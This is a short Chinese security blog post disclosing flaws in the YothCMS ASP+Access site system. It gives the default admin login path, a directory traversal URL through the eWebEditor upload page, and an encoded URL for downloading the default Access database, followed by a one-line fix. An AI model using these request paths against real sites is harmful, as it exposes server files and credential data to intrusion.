YothCMS遍历目录/默认数据库下载漏洞及修复

分类:安全 | 2011-08-6 | 撸过 63 次
0人扯谈

优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS!

YothCMS是由石家庄优斯科技有限公司开发的一套完全开源建站系统, 主要面向企业进行快速的建造简洁,高效,易用,安全的公司企业网门户站,稍具技术的开发人员就能够使用本系统

以最低的成本、最少的 人力投入在最短的时间内架设一个功能齐全、性能优越的公司企业网站。YothCMS是基于ASP+Access开发的一款轻巧高效的网站内容管理系统, 提供了新闻管理模

块,产品管理模块,文件管理模块。在使用过程中可以轻松搭建一个功能丰富的网站。

源码地址:http://www.2cto.com/ym/201107/28374.html

默认后台:admin/login.asp

遍历目录漏洞: ewebeditor/manage/upload.asp?id=1&dir=../

默认数据库下载: http://www.2cto.com /%23da%23ta%23\%23db_%23data%23%23.asa

修复:编辑器是常规问题了,数据库换路径

本站内容均为原创,转载请务必保留署名与链接!
YothCMS遍历目录/默认数据库下载漏洞及修复:https://www.webshell.cc/219.html
标签:

相关日志